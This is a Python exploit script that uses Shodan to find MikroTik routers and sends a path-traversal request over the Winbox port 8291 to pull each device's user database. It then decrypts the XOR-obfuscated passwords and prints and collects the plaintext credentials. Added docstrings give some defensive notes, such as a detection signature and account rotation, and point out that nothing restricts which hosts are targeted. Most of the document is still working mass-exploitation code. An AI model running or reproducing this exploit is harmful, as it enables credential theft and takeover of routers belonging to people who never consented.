import shodan
# Placeholder only. Supply the real key at run time from an environment
# variable or a secret store instead of editing it into this file, so the key
# never ends up in version control or a shared paste.
SHODAN_API_KEY = "xxxxxxxxAPI KEY HERE xxxxxxxx"
# Search client used by main() for the device query.
api = shodan.Shodan(SHODAN_API_KEY)
import os
import sys
import hashlib
import socket
import requests
from subprocess import call
# Module-level accumulator filled by dump(): three parallel lists holding,
# by index, [0] device IPs, [1] usernames and [2] recovered plaintext
# passwords. Despite the name it is a list of lists, not a dict.
mk_creds_dic = [[] for _ in range(3)]
def decrypt_password(user, pass_enc):
    """Recover the plaintext password from one obfuscated user-record field.

    The keystream is ``MD5(user + b"283i4jfkai3389")``, repeated over the
    stored bytes and XORed with them. The key depends only on the username
    and a constant, so anyone who obtains the stored record can invert it.
    For incident response, treat exposure of the record as exposure of the
    password and rotate the account.

    Args:
        user: Username as a bytes-like value (it is concatenated with bytes).
        pass_enc: Obfuscated password bytes (``bytes`` or ``bytearray``).

    Returns:
        The de-obfuscated text up to, but excluding, the first NUL character.
    """
    keystream = hashlib.md5(user + b"283i4jfkai3389").digest()
    # The 16-byte digest wraps around for fields longer than the key.
    plain_chars = [
        chr(cipher_byte ^ keystream[pos % len(keystream)])
        for pos, cipher_byte in enumerate(pass_enc)
    ]
    # Everything after the first NUL is padding and is dropped.
    return "".join(plain_chars).split("\x00")[0]
def extract_user_pass_from_entry(entry):
    """Pull the username and obfuscated password fields out of one record.

    Each field follows a 4-byte marker (``01 00 00 21`` for the username,
    ``11 00 00 21`` for the password) and starts with a one-byte length.

    Args:
        entry: One record as ``bytes`` or ``bytearray``.

    Returns:
        ``(username, password)`` as byte slices. The password is still
        obfuscated. A slice is shorter than its declared length when the
        record is truncated, because slicing does not raise.

    Raises:
        IndexError: If a marker is absent or nothing follows it.
    """
    def _field_after(marker):
        # Text after the first occurrence of the marker: length byte + value.
        tail = entry.split(marker)[1]
        declared_len = tail[0]
        return tail[1:1 + declared_len]

    username = _field_after(b"\x01\x00\x00\x21")
    password = _field_after(b"\x11\x00\x00\x21")
    return username, password
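def get_pair(data):
    """Parse a user-database blob into ``(username, password)`` pairs.

    The blob is split on the ``b"M2"`` record marker. Whatever precedes the
    first marker is ignored. Records without both field markers are skipped.

    Args:
        data: Raw blob as ``bytes`` or ``bytearray``.

    Returns:
        A list of ``(username, plaintext_password)`` string tuples. It holds
        live credentials in clear text, so handle and store it accordingly.

    Raises:
        UnicodeDecodeError: If a username contains non-ASCII bytes.
    """
    user_list = []
    for entry in data.split(b"M2")[1:]:
        try:
            user, pass_encrypted = extract_user_pass_from_entry(entry)
        except IndexError:
            # A missing marker or empty field means this is not a user record.
            # Only IndexError is caught, so Ctrl-C and real bugs are no longer
            # swallowed as they were by the previous bare ``except``.
            continue
        # Derive the key from the raw username bytes before decoding them.
        pass_plain = decrypt_password(user, pass_encrypted)
        user_list.append((user.decode("ascii"), pass_plain))
    return user_list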
def dump(data,ip):
    """Print the credential pairs parsed from ``data`` and record one of them.

    Args:
        data: Raw user-database bytes, passed unchanged to ``get_pair``.
        ip: Address of the device the data came from, stored with the pair.

    Side effects:
        Writes usernames and plaintext passwords to stdout and appends to the
        module-level ``mk_creds_dic``. Both are clear-text credential stores,
        so captured output or logs of this script need the same protection as
        the passwords themselves.
    """
    user_pass = get_pair(data)
    for u, p in user_pass:
        print("User:", u)
        print("Pass:", p)
        print()
    # NOTE(review): the page lost its indentation. Placing these appends after
    # the loop is inferred from main() catching UnboundLocalError, which is
    # what referencing ``u``/``p`` raises here when get_pair() returned
    # nothing. With this layout only the last pair of each device is recorded.
    # Confirm against the original file.
    mk_creds_dic[0].append(ip)
    mk_creds_dic[1].append(u)
    mk_creds_dic[2].append(p)
def main():
    """Query Shodan for 'mikrotik' hosts and request the user database from each.

    For every search match the function opens TCP 8291, sends request ``a``,
    copies one byte of the reply into request ``b``, sends ``b`` and hands the
    second reply (minus its first 55 bytes) to ``dump``.

    Defensive notes, from what the payloads show:
        * Request ``a`` carries, in plain ASCII, a dot-dot path ending in
          ``flash/rw/store/user.dat``. Inbound traffic on 8291 containing
          ``/../`` sequences or ``user.dat`` is a usable detection signature.
        * The passwords in the returned file are only XOR-obfuscated (see
          ``decrypt_password``). A device that answered this request should
          have every account rotated, not just be patched.
        * Exposure depends on 8291 being reachable from untrusted networks.
          Restricting it to a management network and keeping the device
          firmware current are the mitigations.

    NOTE(review): the target list is whatever the search returns. There is no
    scope or allowlist filter between the query and the connection attempt.

    Returns:
        0, always.
    """
    mk_routers_arr = []
    # First request. Bytes 0x2f/0x2e spell the traversal path mentioned above.
    a = [0x68, 0x01, 0x00, 0x66, 0x4d, 0x32, 0x05, 0x00,
    0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x05, 0x07,
    0x00, 0xff, 0x09, 0x07, 0x01, 0x00, 0x00, 0x21,
    0x35, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2e, 0x2f,
    0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f, 0x2f,
    0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x2f, 0x2f, 0x2f,
    0x2f, 0x2f, 0x2e, 0x2f, 0x2e, 0x2e, 0x2f, 0x66,
    0x6c, 0x61, 0x73, 0x68, 0x2f, 0x72, 0x77, 0x2f,
    0x73, 0x74, 0x6f, 0x72, 0x65, 0x2f, 0x75, 0x73,
    0x65, 0x72, 0x2e, 0x64, 0x61, 0x74, 0x02, 0x00,
    0xff, 0x88, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,
    0x08, 0x00, 0x00, 0x00, 0x01, 0x00, 0xff, 0x88,
    0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x02, 0x00,
    0x00, 0x00]
    # Second request. Byte 19 is overwritten per connection (see below).
    b = [0x3b, 0x01, 0x00, 0x39, 0x4d, 0x32, 0x05, 0x00,
    0xff, 0x01, 0x06, 0x00, 0xff, 0x09, 0x06, 0x01,
    0x00, 0xfe, 0x09, 0x35, 0x02, 0x00, 0x00, 0x08,
    0x00, 0x80, 0x00, 0x00, 0x07, 0x00, 0xff, 0x09,
    0x04, 0x02, 0x00, 0xff, 0x88, 0x02, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x01,
    0x00, 0xff, 0x88, 0x02, 0x00, 0x02, 0x00, 0x00,
    0x00, 0x02, 0x00, 0x00, 0x00]
    print('[+] getting mikrotik routers from shodan... ')
    mk_routers_arr = api.search('mikrotik')
    print('[+] Results found: {}'.format(mk_routers_arr['total']))
    print('[+] Lets try top get the creds')
    #print mk_routers_arr
    for result in mk_routers_arr['matches']:
        print('checking router with ip: ' + result['ip_str'])
        try:
            s = socket.socket()
            s.settimeout(3)
            s.connect((result['ip_str'], 8291))
            a = bytearray(a)
            b = bytearray(b)
            s.send(a)
            d = bytearray(s.recv(1024))
            # One byte of the first reply is echoed back in the second
            # request. Presumably a session identifier: TODO confirm.
            b[19] = d[38]
            s.send(b)
            # Single read of at most 1024 bytes. Larger files are truncated.
            d = bytearray(s.recv(1024))
            print(result['ip_str'])
            dump(d[55:],result['ip_str'])
        except socket.error:
            # Also reached on timeouts and refused connections, so the
            # message below is not a reliable statement about the port.
            print('[w] No 8291 port open on ip '+ result['ip_str'])
        except UnboundLocalError:
            # Presumably raised inside dump() when nothing was parsed.
            print('[x] Load error on ip '+ result['ip_str'])
    # NOTE(review): dumps every collected plaintext credential to stdout.
    # Placement after the loop is inferred, because the page lost indentation.
    print(mk_creds_dic)
    return 0
# Entry-point guard: run only when executed as a script, not on import.
# The value returned by main() is discarded.
if __name__ == "__main__":
    main()